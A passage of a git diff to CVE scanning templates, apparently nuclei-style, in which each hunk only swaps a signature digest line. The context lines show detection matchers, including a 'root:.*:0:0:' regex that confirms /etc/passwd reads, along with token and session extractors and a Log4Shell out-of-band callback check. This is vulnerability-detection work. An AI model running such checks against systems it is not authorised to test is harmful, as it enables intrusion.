\ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml index 69b5afcdcd..42300b598c 100644 --- a/http/cves/2021/CVE-2021-41282.yaml +++ b/http/cves/2021/CVE-2021-41282.yaml @@ -66,4 +66,4 @@ http: - '(sid:[a-z0-9,;:]+)' internal: true part: body -# digest: 4b0a00483046022100b22b55fdb5766d919894391f7177aae918603c8c010a1c3dc548f96ef4a45c4d022100db611b361bcb272bcc4771ae5352992d3c7c34007b9abb407fa3339df77adcb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bb62f2af75e25787314e1f044a5a3e99e02997cc2a93b986a8d82e9b09429d3402206aab025b09043d3dabc02f1df26a7d36f2e6871fae22e2c1374e96d030748733:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41291.yaml b/http/cves/2021/CVE-2021-41291.yaml index 62446f3bca..5aa6798071 100644 --- a/http/cves/2021/CVE-2021-41291.yaml +++ b/http/cves/2021/CVE-2021-41291.yaml @@ -39,4 +39,4 @@ http: - type: regex regex: - "root:.*:0:0:" -# digest: 4a0a0047304502207f8b0908b97ff22a89570504251e0836c8b463840c12b998c3766012a1d119a4022100b3627c4c9891d062199b46f969ac720a58088e0472f1ed7e0b44c762688f5cc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207a7a9c4eb1f6d88ab907ed75898c6c89513b60a8ec9f1502d7fdf3423b4ede7e022100c7433e0f70a4c7b46f3ece00d5c940a70f895108e18356877453d392a71c6059:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41293.yaml b/http/cves/2021/CVE-2021-41293.yaml index 26295accf6..fcfbc94766 100644 --- a/http/cves/2021/CVE-2021-41293.yaml +++ b/http/cves/2021/CVE-2021-41293.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201cf6f41a3258c77f1c2a596c881f1d3f0724e938d4f7c03970e59b0c76aa7456022005d47055e3129d39fb98a626771da66a86a32cac9bd81dd969c7b575d3beeacf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022072b7fc4cd692ab9e8e417246f7868462ef847c1f95a960e5a93d4745ca7b37d5022039639a91158fdb53e5d8889d110ffcf32a8946dcd9e56bba02d856301dba9229:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml index 94a0c387f6..7dd93bf32b 100644 --- a/http/cves/2021/CVE-2021-41349.yaml +++ b/http/cves/2021/CVE-2021-41349.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100aecde373293992828c4cfbb89e9aaeff35886bd612304c87e362070bf8bfa32f022053555cdc30e1b0aae2d359b107cd5d99f26bbd2c678f6dcb59b7e21b635ea048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022058875581989ca4e54d5e3986767a50ab67379b96399ae31370838a8802a48a8502202b98ca545a8067cc45c4f296e9c83a84457b158313840ce17c4fa979a4646cab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml index 270f84d39a..fc20ecc3ea 100644 --- a/http/cves/2021/CVE-2021-41432.yaml +++ b/http/cves/2021/CVE-2021-41432.yaml @@ -83,4 +83,4 @@ http: - name="_wpnonce" value="([0-9a-z]+)" /> internal: true part: body -# digest: 490a00463044022012ed36398f3a3adcb31e49e199e687115b484c759fd6cd62c37427c20c9e9e6402203afca5bfd1f61846e94feb44fc4487b7653f647f3f710f3d444859f1386a7c58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202a525d5c59991514ca7aa771cde7ee9eaa3b3643850ffc79f4f05443c7a39034022028c5ce317d97df379d079120c76db5a5398118512631f4143cbdf5288694d131:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41467.yaml b/http/cves/2021/CVE-2021-41467.yaml index 0c64e4d407..8cca8d61d5 100644 --- a/http/cves/2021/CVE-2021-41467.yaml +++ b/http/cves/2021/CVE-2021-41467.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206ceaf43839bf7744044e64e288b4b135c0a9a25f1638c066ee7f2ec6681dc7f4022100e4ea51f58bca51151b2e34e3c43a48ff4a09e9961558ebd344e7e96e23ace169:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aebc31f1000f3df4d4eea75eb59b9c31e33f5c655888104efd755fc64e6a054f022066f2a974d0e0b3691248be5b78a5b9446dbb01b815eff6dd6935a42ebae532f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml index bcc7fd4486..63897e59ad 100644 --- a/http/cves/2021/CVE-2021-41649.yaml +++ b/http/cves/2021/CVE-2021-41649.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009f9574560b61dd8f4c9aaf234d06646f1519c0fc78e8ff44222e53a558d4259502201e5cfa092c0c0038bc53b925eb4d0270f7fa08ea4008152abad1281e7331b883:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ca76f577dc44e2400264e992033f83b1f8a942236bdbac9d9e1bf6e94bdbd2de022041bbbd7308d086ebd09e4e7c688db309354575a00da2a15dfcf7e32f01e4d5e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41749.yaml b/http/cves/2021/CVE-2021-41749.yaml index 6d03f016d1..f742c3c15d 100644 --- a/http/cves/2021/CVE-2021-41749.yaml +++ b/http/cves/2021/CVE-2021-41749.yaml @@ -57,4 +57,4 @@ http: - 'contains_any(body, "Craft CMS", "SEOmatic" ,"CRAFT_CSRF")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100c944618f8aa6b81f58862d8a998accfbe98be7301de9a9dd9aac0f53da956c990220246d8626a6c87df2dabc8a42cdfb9944f07f725dbcb861a0e65db3f02e74466e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e92d124438043c580868e402e2e2ca7d5b520b29beb530c3e30a4600cf951d710220048f8b6f336648d1f32ed6955fdfcfac15fffc42ac0d26b99738da0e4b46c441:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-4191.yaml b/http/cves/2021/CVE-2021-4191.yaml index 481c71c2ea..8b3946e122 100644 --- a/http/cves/2021/CVE-2021-4191.yaml +++ b/http/cves/2021/CVE-2021-4191.yaml @@ -64,4 +64,4 @@ http: - type: json json: - '.data.users.nodes[].username' -# digest: 4a0a004730450220613a98cc368da5cc7ab12e82f5cc55eefc653c8a56c2f399e808367802a55db9022100863f4d035cb38b3e355a7c3d98dde9f7bd2569aa27b24dc79bfd47cd92f1d6a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022050fac34eaa4b8a5b2f213f24950dbd4dcf6f761ac17f565dcb5fd1c07d33eb870220753826f439204315cc1cde0868ff106d22fee305559bdd4ecea19e00b26b80bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-41951.yaml b/http/cves/2021/CVE-2021-41951.yaml index da6933c6d4..93f2e4407e 100644 --- a/http/cves/2021/CVE-2021-41951.yaml +++ b/http/cves/2021/CVE-2021-41951.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022075dfadbb373149d6cf94cfbbdd259581aeee17e122be2f6bfdddb63990affbe0022100b966f3954800e15febb8586b3122c809eb6064901fd9aed1af10ae14fd257205:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022031941daf741a41b37668ec1f1fae42ba658ad64ef871b927b284cd01ed9ca653022100ee5ccf45bad22efb395436c0a823dcaa6fb007fa03ea7bd5d0dbcac34861c491:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml index fb6c1c2b29..057cc91cb2 100644 --- a/http/cves/2021/CVE-2021-42013.yaml +++ b/http/cves/2021/CVE-2021-42013.yaml @@ -67,4 +67,4 @@ http: name: LFI regex: - "root:.*:0:0:" -# digest: 4a0a004730450221008a6bc546c437350fc98f88d2f5b38489ab7086b7fd9446872c2942f85926d15c02202b266a582773335d0ba8f75869654d2aff0c55d27dd9ab7874f19615691ceade:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220631941b1855e5aeb33289778cb170dc873d3382190adfa010bec3870591df078022100d5eec25f6ed39e8e0f85c9abecc7b6505d3688a23cc8c4bb6bc2e90d836a7db1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml index 7eee17aab2..ea1cf336da 100644 --- a/http/cves/2021/CVE-2021-42063.yaml +++ b/http/cves/2021/CVE-2021-42063.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ce5fd76c9a1781db78f0544199cc278915836e75091d4cc5309eb801af17e423022100b8a72be1d67c62ddf8608098bac580263bf2ee4a7e50eed5ca22dfa063fe2c5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206e3c9efaa3a715b8d207baf7f389da9fa984edf381b5bb061f1e06c3668bfe72022100eb3a65ea459eab92757794ebe916ddb26b77809cf661a936536cead7aae41ef6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml index 27f3f94f59..5527ada552 100644 --- a/http/cves/2021/CVE-2021-42237.yaml +++ b/http/cves/2021/CVE-2021-42237.yaml @@ -123,4 +123,4 @@ http: part: body words: - "System.ArgumentNullException" -# digest: 4a0a004730450220549da14eb60031a9b529fc3169ea83c76228729fb4480aed08ee9d0234bb2643022100b19d676bcc6685264030c6a19348a30903eab93b1f9ea1db79f2f51eba4e34d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ab0ccc84d2693500a44a225123543843cf611348becfc83ff492f9cdb6acd964022100b5b3a6d5594ac10297868507176627c21f711192a607e45d72197c0a811cd6b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42565.yaml b/http/cves/2021/CVE-2021-42565.yaml index 9c49827e34..3a341fc7bd 100644 --- a/http/cves/2021/CVE-2021-42565.yaml +++ b/http/cves/2021/CVE-2021-42565.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202200bb33a8fdb2552482855bd64af047fbdaf3c11f7e0a5b4050e4440258bbd902207d6fd8e80473b3d4904728d550b9a8eed1d9e58af15891b29b52697a06fa999b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d4ab13abc51fc8e8aed0a34b0857598d6d5c45892dc84079eec7097957374d25022100c429c3c408aff7b82b3fe4d60af3ed0cedae9293053efc9d423fb82c3b575e11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42566.yaml b/http/cves/2021/CVE-2021-42566.yaml index 4c53bc0282..6fbfe8ab1e 100644 --- a/http/cves/2021/CVE-2021-42566.yaml +++ b/http/cves/2021/CVE-2021-42566.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a07a07fb2e3194ad2762f9efa781ef992a86fbf5feced800125d26495d0864c80220607f5771d48a758fea34771b05b6a74f6b3bcc06e4243f1885d292f44db6df10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100baa5a1f43f51829cac1ea016698d3e5dd9d309eef79e75c77b4bde8098b936cf022100f498c819ae81592210ea03d79e7ca430baefb317d61057da41e5300bc41575ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml index 2741769864..f63cd49636 100644 --- a/http/cves/2021/CVE-2021-42567.yaml +++ b/http/cves/2021/CVE-2021-42567.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 401 -# digest: 490a0046304402204245a7e0a01a60f82cb2318913eef47d7e8cb54540fd75be345987a45500039e022038a89550ac2009c2d5599b7b9c1bdd145e53d22d60f9233b2d33e05c8da7855c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022062c84cad29d9ca7703e8e03ac264d0edb5d2a5748ff4b8909f6c512b03c3df09022100f0d8621b267cecfd1c0c270eae28110c29cece9abc470147ae8a48a531c68df5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml index c510465710..37b867f67e 100644 --- a/http/cves/2021/CVE-2021-42627.yaml +++ b/http/cves/2021/CVE-2021-42627.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022053f4592830c11d887e52e9adf9ce2c3fdd654b249379fa2807f5e168bb8a703a0221008c178ce4e61fac8d8db6a13694f0c1c85e6e25d89d7d15ad0a340f557c8267e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f1b22fc87729007a56fb51d06e2b4ca74c0e1de3d6f54ba05e9705cca21290c022100820374d79b55b9aa0c9eca7827d2619972595a3eb6a7c8a5cdd59da1dca8a20b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml index f6d76339b5..e6eb7c04ec 100644 --- a/http/cves/2021/CVE-2021-42887.yaml +++ b/http/cves/2021/CVE-2021-42887.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 302 -# digest: 4a0a00473045022100e4ad28a7424b05b3865c69632dd1c109d3af0b5d6390857ac6fd73a7a7c3073d0220616a3ce10e35be955671681f8ab9ab5a937cc56e9b08aedfa1faf83202c4d98f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100811a7e5c879a0363e2d74c0779cf35f9f69c0880bff8de452edff0ed0268dbb5022100c3a6abc846b879c935297046e3f25112da0797aa587f4c1bf08d925b0742b9ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43062.yaml b/http/cves/2021/CVE-2021-43062.yaml index 99af1b861a..08ffcdc8de 100644 --- a/http/cves/2021/CVE-2021-43062.yaml +++ b/http/cves/2021/CVE-2021-43062.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022035f3b272f2f2eb3ffd2265b03fc34944ba5ea2298fe4943fccb382b77dcbfb5402206fae9c44d872dbd06fb5992248d7d731d43168f9ce8c47f3ede8c51ca7b34c5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204477b496e3241200c2b91d3461403b663af64b6a0a5536e1bb8fa7820e354f6e022033b11a21dc6450b3b2887a15a256e89542249fae1a025af4428bbe63a1486662:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index 3e38714fe2..8df2d6d1e4 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d0200eeb5397b87ed805111ba73b1f44e9e642500d7a6b71f5b6a960dc8d1549022050d924940eadf44a9064cfa5bcaa5f15133215a9364c377111696b5ac33dd637:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220773163e2853dbed5f6fd4fae6f2f2b243b2605757ec3331c0551eb640638ea0802203c9ca3865da4f10c60c361481455fa5ccfc8bfaa6870724c8ddf74fd7167e254:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43421.yaml b/http/cves/2021/CVE-2021-43421.yaml index bd276d57db..ed98694c46 100644 --- a/http/cves/2021/CVE-2021-43421.yaml +++ b/http/cves/2021/CVE-2021-43421.yaml @@ -58,4 +58,4 @@ http: regex: - '"hash"\:"(.*?)"\,' internal: true -# digest: 490a0046304402202b9a1bdf1cbc00fde97e2d3f69bd9f98e0b6d0990fde7377b3ef61a888ad5cf2022068fa3c61d7aa62376e326713dc467e45fbc1fff477d0aa5a924bb944e6fe37df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df993e9b9153b842893b2405cf8a93a320330ae88a22f3d82a5fa06dd4733e84022100e62912c89bef546ec5b95ecf04d6d37c29f8f46c127f151f6ee890efce8a3c68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43496.yaml b/http/cves/2021/CVE-2021-43496.yaml index 0ecff67cdb..08db62ec3f 100644 --- a/http/cves/2021/CVE-2021-43496.yaml +++ b/http/cves/2021/CVE-2021-43496.yaml @@ -39,4 +39,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4b0a004830460221009aa2706fa8b6ea4b1a71152da0e7922133b04905f0bf17f0e1e62419b4f04ec4022100bb451f8f89d66e01b41d6f2081b87fa1250ff3a6a681fe8ebc42a3f33b0d4b98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ddf7f890623319dce2d58f2403bc17e40763149a8f2e41703c74e20af56bb82502201e57cc3e2e51afefd70f0bc17a5b139e48e7da24ac7f78e5f70b126a05627fcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43510.yaml b/http/cves/2021/CVE-2021-43510.yaml index 1ddd5fcb17..6cf4d72280 100644 --- a/http/cves/2021/CVE-2021-43510.yaml +++ b/http/cves/2021/CVE-2021-43510.yaml @@ -52,4 +52,4 @@ http: - 'contains(body_1, "{\"status\":\"success\"}")' - 'contains(body_2, "Welcome to Simple Client")' condition: and -# digest: 4a0a00473045022100c18c3e42f0e093b790d4012af7e8872c0ded4c1bd1f756b349e64aecbf26c3f802204b2f781d8ce495d24c568095c35a1dc6276120bc72b5cd525b88d324e2f22a97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220262f6dbab5aa11df2d3b7b3f71f2a40c2f061bca4fa2e783b2570300c20e328b022100f63706d6260205efd9fc14c89b8b17c1d87cdbd1c544997adb18b93bfc3afbf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml index fa5d8ee81e..20a7c40ec6 100644 --- a/http/cves/2021/CVE-2021-43574.yaml +++ b/http/cves/2021/CVE-2021-43574.yaml @@ -59,4 +59,4 @@ http: - 500 - 403 condition: or -# digest: 4a0a0047304502203424ac89c9d515601d84bd5d04d987db9f23d90761f8cb77433d965d2382a1bf022100a2dcb2c7b1c8281ba00a17246312fc353a01b546c7af31c8d5409dcffba3baed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f705a6aae88335620af088599ebed27625e3e46caf952bab2a320688df01cf5c022100f9a8a8d4f4cd062bffd80ea3493e2b6e85e209824e278f3b7d62619174083e62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43725.yaml b/http/cves/2021/CVE-2021-43725.yaml index b28dd57297..d3b18de76c 100644 --- a/http/cves/2021/CVE-2021-43725.yaml +++ b/http/cves/2021/CVE-2021-43725.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205990eb03c07bff8f95196ad94df022af52861c263d536dd6b7b5ae0436a0ad3602204a494ff4ceba8fa187c7ad4c5520568c3d8a628919832050610396b57e6ac9ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a32a805b26b2f28db0ebabd7a780eee017ecff6957e00616a43b00c062ba231502205f2fe8e68648e6b4aec358570005a88497189826988ddc5683f6df0961ea5d3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml index 1ecbf05be4..aac18356c8 100644 --- a/http/cves/2021/CVE-2021-43734.yaml +++ b/http/cves/2021/CVE-2021-43734.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a6e3ec97201705f04b5dbb40a063537ca5bfa1325d42d747edb2da45d6d9f51d022100bd70aa78d05d2f6a1e3ea1033983c9a374566efe44d8d930e10297a2b6cacfb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ff571572d59488430e0f0e46235af01ae322d987ab4e6d6c5ea12094d438483b02203207ab5bdea3f11504cce1805418b4b11dcc570e1fd427df104363775d78d551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43778.yaml b/http/cves/2021/CVE-2021-43778.yaml index b3a453604c..cb896b02da 100644 --- a/http/cves/2021/CVE-2021-43778.yaml +++ b/http/cves/2021/CVE-2021-43778.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022001be70fb443486c712120703936560a196126da58c1afc837570c82f4c35ec9802206eec0fba2e411b7d3cbf0b9bb15509191727d985e2f586884f060ab322a41b58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f0bdee0699e5c10cd4af579494659079fcd7fc2165ddb58644c24ec315a043f702200460743342594ef8d5f4fe70a83be35043df22ff4a69370c350effcc24c24183:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43798.yaml b/http/cves/2021/CVE-2021-43798.yaml index 225c8a64e7..a32006f43a 100644 --- a/http/cves/2021/CVE-2021-43798.yaml +++ b/http/cves/2021/CVE-2021-43798.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201c254e7acbf815b78d55849a20c8fe64f4f709c2f3048a9786e99415864e2b71022010a85fbec38c92868fe06464552f78b5d338d127859944ee676b435c76c75834:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022006e969ce9263f4a3e3db8029312a1cedfb5f6b51e452ef014080e879485508c7022100c9f3a7b14ebabee62df5310b48d15f491a8ee89a97fd4cd675b859a4ae26d546:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43810.yaml b/http/cves/2021/CVE-2021-43810.yaml index b191ba1008..27d6049c8d 100644 --- a/http/cves/2021/CVE-2021-43810.yaml +++ b/http/cves/2021/CVE-2021-43810.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100953a61bb137c40872ac341046a3d349378dfe44509b0bf81b8dea18ef859cc9402206cb18380503695b43cd279e399ef8aaa40547d01d55325928f48b3e8ed5a395b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f55f2788a37c785e9107ae5f7513b2f901b9be94ff5ac898e573b286d0725ae0221009a73e086bfa523be7848ca3061e08aa947e3c230a48ba2b1c979a598794eb753:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44077.yaml b/http/cves/2021/CVE-2021-44077.yaml index 0c62873beb..1fa2b68520 100644 --- a/http/cves/2021/CVE-2021-44077.yaml +++ b/http/cves/2021/CVE-2021-44077.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204fd554c182cfd68987b83774e0d8324157c1df50b31b8b690f3527307005225c022100aa4f38455b0e822753606e0952d4f66977be8b5f5d836f09a98635608c2aa9ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201e51031026454c2aba9ab044439d17865fe5d569efc7fea71173efc4dfb63b4a022100d570787f5b40a650af825ef1d8a4813cc3488e0a9018c5f94f4e2c4b9fb701ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml index 40f7fdc4c0..608cb87aea 100644 --- a/http/cves/2021/CVE-2021-44138.yaml +++ b/http/cves/2021/CVE-2021-44138.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c60c98522be0dcb467a48ac59d54daa4c485d602be3d0140cb43d80ee6cb25af0221008796b93591cd7c330c1e1a42b6ea2d3a6416eb0f9d75b34687e5b801c5fe4d79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207dfc82f46979080f52275d61a856c67032779173eb7ab4f02cb3b41b6d2d6e5b022100c940dc9e671f37ffee26ae725400e1fd6d17bc3d7a35c79f2f7c3f998a4a53cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml index 0447b37050..003fad7886 100644 --- a/http/cves/2021/CVE-2021-44139.yaml +++ b/http/cves/2021/CVE-2021-44139.yaml @@ -52,4 +52,4 @@ http: - '"success":true' - '"msg":"success"' condition: and -# digest: 4a0a00473045022100915a0413d4a0e3762b9e14a73e8f4cb8f3c54cf2502df74af4712b8ae9414f8f0220093ff4c4ab5598f6f58d92ab9939337b4c20b50e9bb9366495aee4f828e544df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eadb7914d64bb98ffb2e8f027270243e510c589db3395932abc4394a717e2e14022100a90a89798dd6ea107d1f8a30e7dea96df6d758a05bab69f8b22f2b5a313a5929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml index 4bd251ef2b..8db490ca6e 100644 --- a/http/cves/2021/CVE-2021-44152.yaml +++ b/http/cves/2021/CVE-2021-44152.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022058e22ef0825a67c256b8ecf58ad3a8f63a5ad803c913a95fe044aec1ad6fa0ce02206c27f104f770caf2f1ccb7838363f0f223d12ae87a31497c048909a401041448:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a22c092d9cee3316ecc435afc5ec64b74493d1ff5c6cc276e03708c3d434f336022100f0d0b9f9f6f4f9fed61ac6b2c0bc88b1257206c8b0d74955d368cf1616aab6cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml index 59dd52d4bf..182403b1ae 100644 --- a/http/cves/2021/CVE-2021-44228.yaml +++ b/http/cves/2021/CVE-2021-44228.yaml @@ -81,4 +81,4 @@ http: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' part: interactsh_request # digest: 4a0a0047304502202884fb76d02d44ae24b3e9bc5914a20e89726f929f3a1472cb9ce81e16f6c7320221009fb4e79fd5e58f4a49ccbeff467c990c3be6e32a7e03a2af8db207849e937d5f:922c64590222798bb761d5b6d8e72950 -# digest: 4b0a0048304602210084698cf1b66904e70ba57f9830ea545aaaabc4f6405625b3bd6b1ec6cf5c1518022100dc522d39d9ae7cd427c7125c8abb4ef8b906cd1af06f21c1c9a877bcb1c575d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c401dcfe6f3c1f07d0e14f59b9d5fbfcc5aae8f5549cbf78d618770e410646b022040081c8a73749310437cd2795c22e2de2ea525e182d25ca46f81d8add2d0970c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44427.yaml b/http/cves/2021/CVE-2021-44427.yaml index a4e3199f66..bcc3325cfb 100644 --- a/http/cves/2021/CVE-2021-44427.yaml +++ b/http/cves/2021/CVE-2021-44427.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205e62eb05aae4bbf46183dd117efa4ce53246dbebd71db8d75f2d9d591b4af0d80220279da227b3055d4c2492642f5c94a4bdf582eecf34468d05a4edf1f90a47dc60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022043a5881def01f2e861569e2e5808346f3edbd4a23e80de269808feae1e0604a4022100d0a11e64690396b53c146e6dfce89875b06dbb6c79f3ea1d02f08dc25443f8c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml index cb07051a21..68ab110e4d 100644 --- a/http/cves/2021/CVE-2021-44451.yaml +++ b/http/cves/2021/CVE-2021-44451.yaml @@ -74,4 +74,4 @@ http: - 'name="csrf_token" type="hidden" value="(.*)"' internal: true part: body -# digest: 4b0a004830460221009d940f8a0982384e8bd0f850c06b5915e9aa203c5b4669b9d3b9e045fcc843a0022100dbed9cb50c63e171e7e20611b8677090df662b13a2be3d56ee8b3c8c17ae7bf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 